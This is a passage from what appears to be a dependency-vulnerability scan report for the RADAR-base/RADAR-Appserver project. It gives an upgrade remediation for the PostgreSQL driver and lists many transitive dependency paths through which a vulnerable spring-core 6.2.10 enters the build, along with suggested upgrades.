Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm
wspackage
Remediation
Upgrade org.postgresql:postgresql to version 42.7.11 or higher.
References
high severity
- Vulnerable module: org.springframework:spring-core
- Introduced through: org.springframework:spring-aop@6.2.10, org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 and others
Detailed paths
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springframework:spring-aop@6.2.11.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.radarbase:radar-spring-auth@1.2.1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-health@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-mail@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework:spring-context-support@7.0.7 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-mail@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-starter@4.1.0-RC1 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-RC1 › org.springframework.boot:spring-boot-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-actuator@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-sql@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-http-converter@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot-jackson@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework.boot:spring-boot-servlet@4.1.0-RC1 › org.springframework.boot:spring-boot@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-quartz@4.1.0-RC1 › org.springframework.boot:spring-boot-transaction@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-tx@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-commons@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-commons@4.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-RC1 › org.springframework.boot:spring-boot-jdbc@4.1.0-RC1 › org.springframework:spring-jdbc@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-hibernate@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-RC1 › org.springframework.boot:spring-boot-data-jpa@4.1.0-RC1 › org.springframework.data:spring-data-jpa@4.1.0-RC1 › org.springframework:spring-orm@7.0.7 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-config@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-security@4.1.0-RC1 › org.springframework.boot:spring-boot-security@4.1.0-RC1 › org.springframework.security:spring-security-web@7.1.0-RC1 › org.springframework.security:spring-security-core@7.1.0-RC1 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver › org.springframework.boot:spring-boot-starter-web@4.1.0-RC1 › org.springframework.boot:spring-boot-webmvc@4.1.0-RC1 › org.springframework:spring-webmvc@7.0.7 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
